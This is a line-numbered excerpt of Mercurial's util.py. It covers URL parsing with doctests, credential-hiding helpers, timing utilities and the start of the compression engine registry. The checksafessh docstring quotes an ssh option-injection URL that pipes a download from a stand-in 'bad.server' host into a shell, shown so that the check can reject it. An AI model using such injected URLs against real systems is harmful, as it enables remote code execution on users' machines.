2638 2648 False, both fragment and query are included in path.
2639 2649
2640 2650 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2641 2651
2642 2652 Note that for backward compatibility reasons, bundle URLs do not
2643 2653 take host names. That means 'bundle://../' has a path of '../'.
2644 2654
2645 2655 Examples:
2646 2656
2647 2657 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2648 2658 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2649 2659 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2650 2660 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2651 2661 >>> url(b'file:///home/joe/repo')
2652 2662 <url scheme: 'file', path: '/home/joe/repo'>
2653 2663 >>> url(b'file:///c:/temp/foo/')
2654 2664 <url scheme: 'file', path: 'c:/temp/foo/'>
2655 2665 >>> url(b'bundle:foo')
2656 2666 <url scheme: 'bundle', path: 'foo'>
2657 2667 >>> url(b'bundle://../foo')
2658 2668 <url scheme: 'bundle', path: '../foo'>
2659 2669 >>> url(br'c:\foo\bar')
2660 2670 <url path: 'c:\\foo\\bar'>
2661 2671 >>> url(br'\\blah\blah\blah')
2662 2672 <url path: '\\\\blah\\blah\\blah'>
2663 2673 >>> url(br'\\blah\blah\blah#baz')
2664 2674 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2665 2675 >>> url(br'file:///C:\users\me')
2666 2676 <url scheme: 'file', path: 'C:\\users\\me'>
2667 2677
2668 2678 Authentication credentials:
2669 2679
2670 2680 >>> url(b'ssh://joe:xyz@x/repo')
2671 2681 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2672 2682 >>> url(b'ssh://joe@x/repo')
2673 2683 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2674 2684
2675 2685 Query strings and fragments:
2676 2686
2677 2687 >>> url(b'http://host/a?b#c')
2678 2688 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2679 2689 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2680 2690 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2681 2691
2682 2692 Empty path:
2683 2693
2684 2694 >>> url(b'')
2685 2695 <url path: ''>
2686 2696 >>> url(b'#a')
2687 2697 <url path: '', fragment: 'a'>
2688 2698 >>> url(b'http://host/')
2689 2699 <url scheme: 'http', host: 'host', path: ''>
2690 2700 >>> url(b'http://host/#a')
2691 2701 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2692 2702
2693 2703 Only scheme:
2694 2704
2695 2705 >>> url(b'http:')
2696 2706 <url scheme: 'http'>
2697 2707 """
2698 2708
2699 2709 _safechars = "!~*'()+"
2700 2710 _safepchars = "/!~*'()+:\\"
2701 2711 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2702 2712
2703 2713 def __init__(self, path, parsequery=True, parsefragment=True):
2704 2714 # We slowly chomp away at path until we have only the path left
2705 2715 self.scheme = self.user = self.passwd = self.host = None
2706 2716 self.port = self.path = self.query = self.fragment = None
2707 2717 self._localpath = True
2708 2718 self._hostport = ''
2709 2719 self._origpath = path
2710 2720
2711 2721 if parsefragment and '#' in path:
2712 2722 path, self.fragment = path.split('#', 1)
2713 2723
2714 2724 # special case for Windows drive letters and UNC paths
2715 2725 if hasdriveletter(path) or path.startswith('\\\\'):
2716 2726 self.path = path
2717 2727 return
2718 2728
2719 2729 # For compatibility reasons, we can't handle bundle paths as
2720 2730 # normal URLS
2721 2731 if path.startswith('bundle:'):
2722 2732 self.scheme = 'bundle'
2723 2733 path = path[7:]
2724 2734 if path.startswith('//'):
2725 2735 path = path[2:]
2726 2736 self.path = path
2727 2737 return
2728 2738
2729 2739 if self._matchscheme(path):
2730 2740 parts = path.split(':', 1)
2731 2741 if parts[0]:
2732 2742 self.scheme, path = parts
2733 2743 self._localpath = False
2734 2744
2735 2745 if not path:
2736 2746 path = None
2737 2747 if self._localpath:
2738 2748 self.path = ''
2739 2749 return
2740 2750 else:
2741 2751 if self._localpath:
2742 2752 self.path = path
2743 2753 return
2744 2754
2745 2755 if parsequery and '?' in path:
2746 2756 path, self.query = path.split('?', 1)
2747 2757 if not path:
2748 2758 path = None
2749 2759 if not self.query:
2750 2760 self.query = None
2751 2761
2752 2762 # // is required to specify a host/authority
2753 2763 if path and path.startswith('//'):
2754 2764 parts = path[2:].split('/', 1)
2755 2765 if len(parts) > 1:
2756 2766 self.host, path = parts
2757 2767 else:
2758 2768 self.host = parts[0]
2759 2769 path = None
2760 2770 if not self.host:
2761 2771 self.host = None
2762 2772 # path of file:///d is /d
2763 2773 # path of file:///d:/ is d:/, not /d:/
2764 2774 if path and not hasdriveletter(path):
2765 2775 path = '/' + path
2766 2776
2767 2777 if self.host and '@' in self.host:
2768 2778 self.user, self.host = self.host.rsplit('@', 1)
2769 2779 if ':' in self.user:
2770 2780 self.user, self.passwd = self.user.split(':', 1)
2771 2781 if not self.host:
2772 2782 self.host = None
2773 2783
2774 2784 # Don't split on colons in IPv6 addresses without ports
2775 2785 if (self.host and ':' in self.host and
2776 2786 not (self.host.startswith('[') and self.host.endswith(']'))):
2777 2787 self._hostport = self.host
2778 2788 self.host, self.port = self.host.rsplit(':', 1)
2779 2789 if not self.host:
2780 2790 self.host = None
2781 2791
2782 2792 if (self.host and self.scheme == 'file' and
2783 2793 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2784 2794 raise error.Abort(_('file:// URLs can only refer to localhost'))
2785 2795
2786 2796 self.path = path
2787 2797
2788 2798 # leave the query string escaped
2789 2799 for a in ('user', 'passwd', 'host', 'port',
2790 2800 'path', 'fragment'):
2791 2801 v = getattr(self, a)
2792 2802 if v is not None:
2793 2803 setattr(self, a, urlreq.unquote(v))
2794 2804
2795 2805 @encoding.strmethod
2796 2806 def __repr__(self):
2797 2807 attrs = []
2798 2808 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2799 2809 'query', 'fragment'):
2800 2810 v = getattr(self, a)
2801 2811 if v is not None:
2802 2812 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2803 2813 return '<url %s>' % ', '.join(attrs)
2804 2814
2805 2815 def __bytes__(self):
2806 2816 r"""Join the URL's components back into a URL string.
2807 2817
2808 2818 Examples:
2809 2819
2810 2820 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2811 2821 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2812 2822 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2813 2823 'http://user:pw@host:80/?foo=bar&baz=42'
2814 2824 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2815 2825 'http://user:pw@host:80/?foo=bar%3dbaz'
2816 2826 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2817 2827 'ssh://user:pw@[::1]:2200//home/joe#'
2818 2828 >>> bytes(url(b'http://localhost:80//'))
2819 2829 'http://localhost:80//'
2820 2830 >>> bytes(url(b'http://localhost:80/'))
2821 2831 'http://localhost:80/'
2822 2832 >>> bytes(url(b'http://localhost:80'))
2823 2833 'http://localhost:80/'
2824 2834 >>> bytes(url(b'bundle:foo'))
2825 2835 'bundle:foo'
2826 2836 >>> bytes(url(b'bundle://../foo'))
2827 2837 'bundle:../foo'
2828 2838 >>> bytes(url(b'path'))
2829 2839 'path'
2830 2840 >>> bytes(url(b'file:///tmp/foo/bar'))
2831 2841 'file:///tmp/foo/bar'
2832 2842 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2833 2843 'file:///c:/tmp/foo/bar'
2834 2844 >>> print(url(br'bundle:foo\bar'))
2835 2845 bundle:foo\bar
2836 2846 >>> print(url(br'file:///D:\data\hg'))
2837 2847 file:///D:\data\hg
2838 2848 """
2839 2849 if self._localpath:
2840 2850 s = self.path
2841 2851 if self.scheme == 'bundle':
2842 2852 s = 'bundle:' + s
2843 2853 if self.fragment:
2844 2854 s += '#' + self.fragment
2845 2855 return s
2846 2856
2847 2857 s = self.scheme + ':'
2848 2858 if self.user or self.passwd or self.host:
2849 2859 s += '//'
2850 2860 elif self.scheme and (not self.path or self.path.startswith('/')
2851 2861 or hasdriveletter(self.path)):
2852 2862 s += '//'
2853 2863 if hasdriveletter(self.path):
2854 2864 s += '/'
2855 2865 if self.user:
2856 2866 s += urlreq.quote(self.user, safe=self._safechars)
2857 2867 if self.passwd:
2858 2868 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2859 2869 if self.user or self.passwd:
2860 2870 s += '@'
2861 2871 if self.host:
2862 2872 if not (self.host.startswith('[') and self.host.endswith(']')):
2863 2873 s += urlreq.quote(self.host)
2864 2874 else:
2865 2875 s += self.host
2866 2876 if self.port:
2867 2877 s += ':' + urlreq.quote(self.port)
2868 2878 if self.host:
2869 2879 s += '/'
2870 2880 if self.path:
2871 2881 # TODO: similar to the query string, we should not unescape the
2872 2882 # path when we store it, the path might contain '%2f' = '/',
2873 2883 # which we should *not* escape.
2874 2884 s += urlreq.quote(self.path, safe=self._safepchars)
2875 2885 if self.query:
2876 2886 # we store the query in escaped form.
2877 2887 s += '?' + self.query
2878 2888 if self.fragment is not None:
2879 2889 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2880 2890 return s
2881 2891
2882 2892 __str__ = encoding.strmethod(__bytes__)
2883 2893
2884 2894 def authinfo(self):
2885 2895 user, passwd = self.user, self.passwd
2886 2896 try:
2887 2897 self.user, self.passwd = None, None
2888 2898 s = bytes(self)
2889 2899 finally:
2890 2900 self.user, self.passwd = user, passwd
2891 2901 if not self.user:
2892 2902 return (s, None)
2893 2903 # authinfo[1] is passed to urllib2 password manager, and its
2894 2904 # URIs must not contain credentials. The host is passed in the
2895 2905 # URIs list because Python < 2.4.3 uses only that to search for
2896 2906 # a password.
2897 2907 return (s, (None, (s, self.host),
2898 2908 self.user, self.passwd or ''))
2899 2909
2900 2910 def isabs(self):
2901 2911 if self.scheme and self.scheme != 'file':
2902 2912 return True # remote URL
2903 2913 if hasdriveletter(self.path):
2904 2914 return True # absolute for our purposes - can't be joined()
2905 2915 if self.path.startswith(br'\\'):
2906 2916 return True # Windows UNC path
2907 2917 if self.path.startswith('/'):
2908 2918 return True # POSIX-style
2909 2919 return False
2910 2920
2911 2921 def localpath(self):
2912 2922 if self.scheme == 'file' or self.scheme == 'bundle':
2913 2923 path = self.path or '/'
2914 2924 # For Windows, we need to promote hosts containing drive
2915 2925 # letters to paths with drive letters.
2916 2926 if hasdriveletter(self._hostport):
2917 2927 path = self._hostport + '/' + self.path
2918 2928 elif (self.host is not None and self.path
2919 2929 and not hasdriveletter(path)):
2920 2930 path = '/' + path
2921 2931 return path
2922 2932 return self._origpath
2923 2933
2924 2934 def islocal(self):
2925 2935 '''whether localpath will return something that posixfile can open'''
2926 2936 return (not self.scheme or self.scheme == 'file'
2927 2937 or self.scheme == 'bundle')
2928 2938
2929 2939 def hasscheme(path):
2930 2940 return bool(url(path).scheme)
2931 2941
2932 2942 def hasdriveletter(path):
2933 2943 return path and path[1:2] == ':' and path[0:1].isalpha()
2934 2944
2935 2945 def urllocalpath(path):
2936 2946 return url(path, parsequery=False, parsefragment=False).localpath()
2937 2947
2938 2948 def checksafessh(path):
2939 2949 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2940 2950
2941 2951 This is a sanity check for ssh urls. ssh will parse the first item as
2942 2952 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2943 2953 Let's prevent these potentially exploitable urls entirely and warn the
2944 2954 user.
2945 2955
2946 2956 Raises an error.Abort when the url is unsafe.
2947 2957 """
2948 2958 path = urlreq.unquote(path)
2949 2959 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2950 2960 raise error.Abort(_('potentially unsafe url: %r') %
2951 2961 (pycompat.bytestr(path),))
2952 2962
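# Example (illustrative): option-injection attempts are rejected.
#
#   checksafessh(b'ssh://-oProxyCommand=evil/path')   # raises error.Abort
#   checksafessh(b'ssh://host/path')                  # ok, returns None
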
2953 2963 def hidepassword(u):
2954 2964 '''hide user credential in a url string'''
2955 2965 u = url(u)
2956 2966 if u.passwd:
2957 2967 u.passwd = '***'
2958 2968 return bytes(u)
2959 2969
2960 2970 def removeauth(u):
2961 2971 '''remove all authentication information from a url string'''
2962 2972 u = url(u)
2963 2973 u.user = u.passwd = None
2964 2974 return bytes(u)
2965 2975
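# Examples (illustrative; the url is hypothetical):
#
#   hidepassword(b'http://jo:secret@example.com/repo')
#   # -> 'http://jo:***@example.com/repo'
#   removeauth(b'http://jo:secret@example.com/repo')
#   # -> 'http://example.com/repo'
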
2966 2976 timecount = unitcountfn(
2967 2977 (1, 1e3, _('%.0f s')),
2968 2978 (100, 1, _('%.1f s')),
2969 2979 (10, 1, _('%.2f s')),
2970 2980 (1, 1, _('%.3f s')),
2971 2981 (100, 0.001, _('%.1f ms')),
2972 2982 (10, 0.001, _('%.2f ms')),
2973 2983 (1, 0.001, _('%.3f ms')),
2974 2984 (100, 0.000001, _('%.1f us')),
2975 2985 (10, 0.000001, _('%.2f us')),
2976 2986 (1, 0.000001, _('%.3f us')),
2977 2987 (100, 0.000000001, _('%.1f ns')),
2978 2988 (10, 0.000000001, _('%.2f ns')),
2979 2989 (1, 0.000000001, _('%.3f ns')),
2980 2990 )
2981 2991
2982 2992 @attr.s
2983 2993 class timedcmstats(object):
2984 2994 """Stats information produced by the timedcm context manager on entering."""
2985 2995
2986 2996 # the starting value of the timer as a float (meaning and resolution
2987 2997 # are platform dependent, see util.timer)
2988 2998 start = attr.ib(default=attr.Factory(lambda: timer()))
2989 2999 # the number of seconds as a floating point value; starts at 0, updated when
2990 3000 # the context is exited.
2991 3001 elapsed = attr.ib(default=0)
2992 3002 # the number of nested timedcm context managers.
2993 3003 level = attr.ib(default=1)
2994 3004
2995 3005 def __bytes__(self):
2996 3006 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2997 3007
2998 3008 __str__ = encoding.strmethod(__bytes__)
2999 3009
3000 3010 @contextlib.contextmanager
3001 3011 def timedcm(whencefmt, *whenceargs):
3002 3012 """A context manager that produces timing information for a given context.
3003 3013
3004 3014 On entering, a timedcmstats instance is produced.
3005 3015
3006 3016 This context manager is reentrant.
3007 3017
3008 3018 """
3009 3019 # track nested context managers
3010 3020 timedcm._nested += 1
3011 3021 timing_stats = timedcmstats(level=timedcm._nested)
3012 3022 try:
3013 3023 with tracing.log(whencefmt, *whenceargs):
3014 3024 yield timing_stats
3015 3025 finally:
3016 3026 timing_stats.elapsed = timer() - timing_stats.start
3017 3027 timedcm._nested -= 1
3018 3028
3019 3029 timedcm._nested = 0
3020 3030
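# Example (illustrative):
#
#   with timedcm(b'frobnicating %s', b'widget') as stats:
#       pass   # timed work goes here
#   # bytes(stats) -> e.g. '1.23 us'
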
3021 3031 def timed(func):
3022 3032 '''Report the execution time of a function call to stderr.
3023 3033
3024 3034 During development, use as a decorator when you need to measure
3025 3035 the cost of a function, e.g. as follows:
3026 3036
3027 3037 @util.timed
3028 3038 def foo(a, b, c):
3029 3039 pass
3030 3040 '''
3031 3041
3032 3042 def wrapper(*args, **kwargs):
3033 3043 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3034 3044 result = func(*args, **kwargs)
3035 3045 stderr = procutil.stderr
3036 3046 stderr.write('%s%s: %s\n' % (
3037 3047 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3038 3048 time_stats))
3039 3049 return result
3040 3050 return wrapper
3041 3051
3042 3052 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3043 3053 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3044 3054
3045 3055 def sizetoint(s):
3046 3056 '''Convert a space specifier to a byte count.
3047 3057
3048 3058 >>> sizetoint(b'30')
3049 3059 30
3050 3060 >>> sizetoint(b'2.2kb')
3051 3061 2252
3052 3062 >>> sizetoint(b'6M')
3053 3063 6291456
3054 3064 '''
3055 3065 t = s.strip().lower()
3056 3066 try:
3057 3067 for k, u in _sizeunits:
3058 3068 if t.endswith(k):
3059 3069 return int(float(t[:-len(k)]) * u)
3060 3070 return int(t)
3061 3071 except ValueError:
3062 3072 raise error.ParseError(_("couldn't parse size: %s") % s)
3063 3073
3064 3074 class hooks(object):
3065 3075 '''A collection of hook functions that can be used to extend a
3066 3076 function's behavior. Hooks are called in lexicographic order,
3067 3077 based on the names of their sources.'''
3068 3078
3069 3079 def __init__(self):
3070 3080 self._hooks = []
3071 3081
3072 3082 def add(self, source, hook):
3073 3083 self._hooks.append((source, hook))
3074 3084
3075 3085 def __call__(self, *args):
3076 3086 self._hooks.sort(key=lambda x: x[0])
3077 3087 results = []
3078 3088 for source, hook in self._hooks:
3079 3089 results.append(hook(*args))
3080 3090 return results
3081 3091
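# Example (illustrative): hooks run sorted by source name, not by
# registration order.
#
#   h = hooks()
#   h.add(b'zz-source', lambda x: x * 2)
#   h.add(b'aa-source', lambda x: x + 1)
#   h(3)   # -> [4, 6]
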
3082 3092 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3083 3093 '''Yields lines for a nicely formatted stacktrace.
3084 3094 Skips the 'skip' last entries, then returns the last 'depth' entries.
3085 3095 Each file+linenumber is formatted according to fileline.
3086 3096 Each line is formatted according to line.
3087 3097 If line is None, it yields:
3088 3098 length of longest filepath+line number,
3089 3099 filepath+linenumber,
3090 3100 function
3091 3101
3092 3102 Not to be used in production code, but very convenient while developing.
3093 3103 '''
3094 3104 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3095 3105 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3096 3106 ][-depth:]
3097 3107 if entries:
3098 3108 fnmax = max(len(entry[0]) for entry in entries)
3099 3109 for fnln, func in entries:
3100 3110 if line is None:
3101 3111 yield (fnmax, fnln, func)
3102 3112 else:
3103 3113 yield line % (fnmax, fnln, func)
3104 3114
3105 3115 def debugstacktrace(msg='stacktrace', skip=0,
3106 3116 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3107 3117 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3108 3118 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3109 3119 By default it will flush stdout first.
3110 3120 It can be used everywhere and intentionally does not require an ui object.
3111 3121 Not to be used in production code, but very convenient while developing.
3112 3122 '''
3113 3123 if otherf:
3114 3124 otherf.flush()
3115 3125 f.write('%s at:\n' % msg.rstrip())
3116 3126 for line in getstackframes(skip + 1, depth=depth):
3117 3127 f.write(line)
3118 3128 f.flush()
3119 3129
3120 3130 class dirs(object):
3121 3131 '''a multiset of directory names from a dirstate or manifest'''
3122 3132
3123 3133 def __init__(self, map, skip=None):
3124 3134 self._dirs = {}
3125 3135 addpath = self.addpath
3126 3136 if safehasattr(map, 'iteritems') and skip is not None:
3127 3137 for f, s in map.iteritems():
3128 3138 if s[0] != skip:
3129 3139 addpath(f)
3130 3140 else:
3131 3141 for f in map:
3132 3142 addpath(f)
3133 3143
3134 3144 def addpath(self, path):
3135 3145 dirs = self._dirs
3136 3146 for base in finddirs(path):
3137 3147 if base in dirs:
3138 3148 dirs[base] += 1
3139 3149 return
3140 3150 dirs[base] = 1
3141 3151
3142 3152 def delpath(self, path):
3143 3153 dirs = self._dirs
3144 3154 for base in finddirs(path):
3145 3155 if dirs[base] > 1:
3146 3156 dirs[base] -= 1
3147 3157 return
3148 3158 del dirs[base]
3149 3159
3150 3160 def __iter__(self):
3151 3161 return iter(self._dirs)
3152 3162
3153 3163 def __contains__(self, d):
3154 3164 return d in self._dirs
3155 3165
3156 3166 if safehasattr(parsers, 'dirs'):
3157 3167 dirs = parsers.dirs
3158 3168
3159 3169 def finddirs(path):
3160 3170 pos = path.rfind('/')
3161 3171 while pos != -1:
3162 3172 yield path[:pos]
3163 3173 pos = path.rfind('/', 0, pos)
3164 3174
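# Example (illustrative):
#
#   list(finddirs(b'a/b/c'))   # -> [b'a/b', b'a']
#   d = dirs([b'a/b/c', b'a/d'])
#   b'a' in d       # -> True
#   b'a/b/c' in d   # -> False (only directories are tracked)
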
3165 3175 # compression code
3166 3176
3167 3177 SERVERROLE = 'server'
3168 3178 CLIENTROLE = 'client'
3169 3179
3170 3180 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3171 3181 (u'name', u'serverpriority',
3172 3182 u'clientpriority'))
3173 3183
3174 3184 class compressormanager(object):
3175 3185 """Holds registrations of various compression engines.
3176 3186
3177 3187 This class essentially abstracts the differences between compression
3178 3188 engines to allow new compression formats to be added easily, possibly from
3179 3189 extensions.
3180 3190
3181 3191 Compressors are registered against the global instance by calling its
3182 3192 ``register()`` method.
3183 3193 """
3184 3194 def __init__(self):
3185 3195 self._engines = {}
3186 3196 # Bundle spec human name to engine name.
3187 3197 self._bundlenames = {}
3188 3198 # Internal bundle identifier to engine name.
3189 3199 self._bundletypes = {}
3190 3200 # Revlog header to engine name.
3191 3201 self._revlogheaders = {}
3192 3202 # Wire proto identifier to engine name.
3193 3203 self._wiretypes = {}
3194 3204
3195 3205 def __getitem__(self, key):
3196 3206 return self._engines[key]
3197 3207
3198 3208 def __contains__(self, key):
3199 3209 return key in self._engines
3200 3210
3201 3211 def __iter__(self):
3202 3212 return iter(self._engines.keys())
3203 3213
3204 3214 def register(self, engine):
3205 3215 """Register a compression engine with the manager.
3206 3216
3207 3217 The argument must be a ``compressionengine`` instance.
3208 3218 """
3209 3219 if not isinstance(engine, compressionengine):
3210 3220 raise ValueError(_('argument must be a compressionengine'))
3211 3221
3212 3222 name = engine.name()
3213 3223
3214 3224 if name in self._engines:
3215 3225 raise error.Abort(_('compression engine %s already registered') %
3216 3226 name)
3217 3227
3218 3228 bundleinfo = engine.bundletype()
3219 3229 if bundleinfo:
3220 3230 bundlename, bundletype = bundleinfo
3221 3231
3222 3232 if bundlename in self._bundlenames:
3223 3233 raise error.Abort(_('bundle name %s already registered') %
3224 3234 bundlename)
3225 3235 if bundletype in self._bundletypes:
3226 3236 raise error.Abort(_('bundle type %s already registered by %s') %
3227 3237 (bundletype, self._bundletypes[bundletype]))
3228 3238
3229 3239 # No external facing name declared.
3230 3240 if bundlename:
3231 3241 self._bundlenames[bundlename] = name
3232 3242
3233 3243 self._bundletypes[bundletype] = name
3234 3244
3235 3245 wiresupport = engine.wireprotosupport()
3236 3246 if wiresupport:
3237 3247 wiretype = wiresupport.name
3238 3248 if wiretype in self._wiretypes:
3239 3249 raise error.Abort(_('wire protocol compression %s already '
3240 3250 'registered by %s') %
3241 3251 (wiretype, self._wiretypes[wiretype]))
3242 3252
3243 3253 self._wiretypes[wiretype] = name
3244 3254
3245 3255 revlogheader = engine.revlogheader()
3246 3256 if revlogheader and revlogheader in self._revlogheaders:
3247 3257 raise error.Abort(_('revlog header %s already registered by %s') %
3248 3258 (revlogheader, self._revlogheaders[revlogheader]))
3249 3259
3250 3260 if revlogheader:
3251 3261 self._revlogheaders[revlogheader] = name
3252 3262
3253 3263 self._engines[name] = engine
3254 3264
3255 3265 @property
3256 3266 def supportedbundlenames(self):
3257 3267 return set(self._bundlenames.keys())
3258 3268
3259 3269 @property
3260 3270 def supportedbundletypes(self):
3261 3271 return set(self._bundletypes.keys())
3262 3272
3263 3273 def forbundlename(self, bundlename):
3264 3274 """Obtain a compression engine registered to a bundle name.
3265 3275
3266 3276 Will raise KeyError if the bundle type isn't registered.
3267 3277
3268 3278 Will abort if the engine is known but not available.
3269 3279 """
3270 3280 engine = self._engines[self._bundlenames[bundlename]]
3271 3281 if not engine.available():
3272 3282 raise error.Abort(_('compression engine %s could not be loaded') %
3273 3283 engine.name())
3274 3284 return engine
3275 3285
3276 3286 def forbundletype(self, bundletype):
3277 3287 """Obtain a compression engine registered to a bundle type.
3278 3288
3279 3289 Will raise KeyError if the bundle type isn't registered.
3280 3290
3281 3291 Will abort if the engine is known but not available.
3282 3292 """
3283 3293 engine = self._engines[self._bundletypes[bundletype]]
3284 3294 if not engine.available():
3285 3295 raise error.Abort(_('compression engine %s could not be loaded') %
3286 3296 engine.name())
3287 3297 return engine
3288 3298
3289 3299 def supportedwireengines(self, role, onlyavailable=True):
3290 3300 """Obtain compression engines that support the wire protocol.
3291 3301
3292 3302 Returns a list of engines in prioritized order, most desired first.
3293 3303
3294 3304 If ``onlyavailable`` is set, filter out engines that can't be
3295 3305 loaded.
3296 3306 """
3297 3307 assert role in (SERVERROLE, CLIENTROLE)
3298 3308
3299 3309 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3300 3310
3301 3311 engines = [self._engines[e] for e in self._wiretypes.values()]
3302 3312 if onlyavailable:
3303 3313 engines = [e for e in engines if e.available()]
3304 3314
3305 3315 def getkey(e):
3306 3316 # Sort first by priority, highest first. In case of tie, sort
3307 3317 # alphabetically. This is arbitrary, but ensures output is
3308 3318 # stable.
3309 3319 w = e.wireprotosupport()
3310 3320 return -1 * getattr(w, attr), w.name
3311 3321
3312 3322 return list(sorted(engines, key=getkey))
3313 3323
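As a concrete illustration of this ordering (a sketch using the ``compengines`` instance created just below and the ``SERVERROLE`` constant defined earlier in this module; the priorities are the defaults of the built-in engines registered later in this file):

    # Server-side defaults: zstd=50, zlib=20, bzip2=0, none=0. The
    # 0-priority tie is broken alphabetically, so the result is
    # [zstd, zlib, bzip2, none]; filtering of non-positive priorities
    # for advertisement happens elsewhere.
    ordered = compengines.supportedwireengines(SERVERROLE)
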
3314 3324 def forwiretype(self, wiretype):
3315 3325 engine = self._engines[self._wiretypes[wiretype]]
3316 3326 if not engine.available():
3317 3327 raise error.Abort(_('compression engine %s could not be loaded') %
3318 3328 engine.name())
3319 3329 return engine
3320 3330
3321 3331 def forrevlogheader(self, header):
3322 3332 """Obtain a compression engine registered to a revlog header.
3323 3333
3324 3334 Will raise KeyError if the revlog header value isn't registered.
3325 3335 """
3326 3336 return self._engines[self._revlogheaders[header]]
3327 3337
3328 3338 compengines = compressormanager()
3329 3339
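For orientation, a hedged sketch of how this registry is consulted once the built-in engines defined later in this file have registered themselves (the engine and bundle names are the real built-ins; the variable names are illustrative):

    from mercurial import util

    # Direct lookup by registered engine name.
    zl = util.compengines['zlib']

    # Resolve a user-facing bundle spec name, aborting if the engine is
    # registered but cannot be loaded (e.g. a missing C extension).
    gz = util.compengines.forbundlename('gzip')

    # Bundle spec names suitable for presenting to users.
    specs = util.compengines.supportedbundlenames
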
3330 3340 class compressionengine(object):
3331 3341 """Base class for compression engines.
3332 3342
3333 3343 Compression engines must implement the interface defined by this class.
3334 3344 """
3335 3345 def name(self):
3336 3346 """Returns the name of the compression engine.
3337 3347
3338 3348 This is the key the engine is registered under.
3339 3349
3340 3350 This method must be implemented.
3341 3351 """
3342 3352 raise NotImplementedError()
3343 3353
3344 3354 def available(self):
3345 3355 """Whether the compression engine is available.
3346 3356
3347 3357 The intent of this method is to allow optional compression engines
3348 3358 that may not be available in all installations (such as engines relying
3349 3359 on C extensions that may not be present).
3350 3360 """
3351 3361 return True
3352 3362
3353 3363 def bundletype(self):
3354 3364 """Describes bundle identifiers for this engine.
3355 3365
3356 3366 If this compression engine isn't supported for bundles, returns None.
3357 3367
3358 3368 If this engine can be used for bundles, returns a 2-tuple of strings of
3359 3369 the user-facing "bundle spec" compression name and an internal
3360 3370 identifier used to denote the compression format within bundles. To
3361 3371 exclude the name from external usage, set the first element to ``None``.
3362 3372
3363 3373 If bundle compression is supported, the class must also implement
3364 3374         ``compressstream`` and ``decompressorreader``.
3365 3375
3366 3376 The docstring of this method is used in the help system to tell users
3367 3377 about this engine.
3368 3378 """
3369 3379 return None
3370 3380
3371 3381 def wireprotosupport(self):
3372 3382 """Declare support for this compression format on the wire protocol.
3373 3383
3374 3384 If this compression engine isn't supported for compressing wire
3375 3385 protocol payloads, returns None.
3376 3386
3377 3387 Otherwise, returns ``compenginewireprotosupport`` with the following
3378 3388 fields:
3379 3389
3380 3390 * String format identifier
3381 3391 * Integer priority for the server
3382 3392 * Integer priority for the client
3383 3393
3384 3394 The integer priorities are used to order the advertisement of format
3385 3395 support by server and client. The highest integer is advertised
3386 3396 first. Integers with non-positive values aren't advertised.
3387 3397
3388 3398 The priority values are somewhat arbitrary and only used for default
3389 3399 ordering. The relative order can be changed via config options.
3390 3400
3391 3401 If wire protocol compression is supported, the class must also implement
3392 3402 ``compressstream`` and ``decompressorreader``.
3393 3403 """
3394 3404 return None
3395 3405
3396 3406 def revlogheader(self):
3397 3407 """Header added to revlog chunks that identifies this engine.
3398 3408
3399 3409 If this engine can be used to compress revlogs, this method should
3400 3410 return the bytes used to identify chunks compressed with this engine.
3401 3411 Else, the method should return ``None`` to indicate it does not
3402 3412 participate in revlog compression.
3403 3413 """
3404 3414 return None
3405 3415
3406 3416 def compressstream(self, it, opts=None):
3407 3417 """Compress an iterator of chunks.
3408 3418
3409 3419 The method receives an iterator (ideally a generator) of chunks of
3410 3420 bytes to be compressed. It returns an iterator (ideally a generator)
3411 3421 of bytes of chunks representing the compressed output.
3412 3422
3413 3423 Optionally accepts an argument defining how to perform compression.
3414 3424 Each engine treats this argument differently.
3415 3425 """
3416 3426 raise NotImplementedError()
3417 3427
3418 3428 def decompressorreader(self, fh):
3419 3429 """Perform decompression on a file object.
3420 3430
3421 3431 Argument is an object with a ``read(size)`` method that returns
3422 3432         compressed data. Return value is an object with a ``read(size)``
3423 3433         method that returns uncompressed data.
3424 3434 """
3425 3435 raise NotImplementedError()
3426 3436
3427 3437 def revlogcompressor(self, opts=None):
3428 3438 """Obtain an object that can be used to compress revlog entries.
3429 3439
3430 3440 The object has a ``compress(data)`` method that compresses binary
3431 3441 data. This method returns compressed binary data or ``None`` if
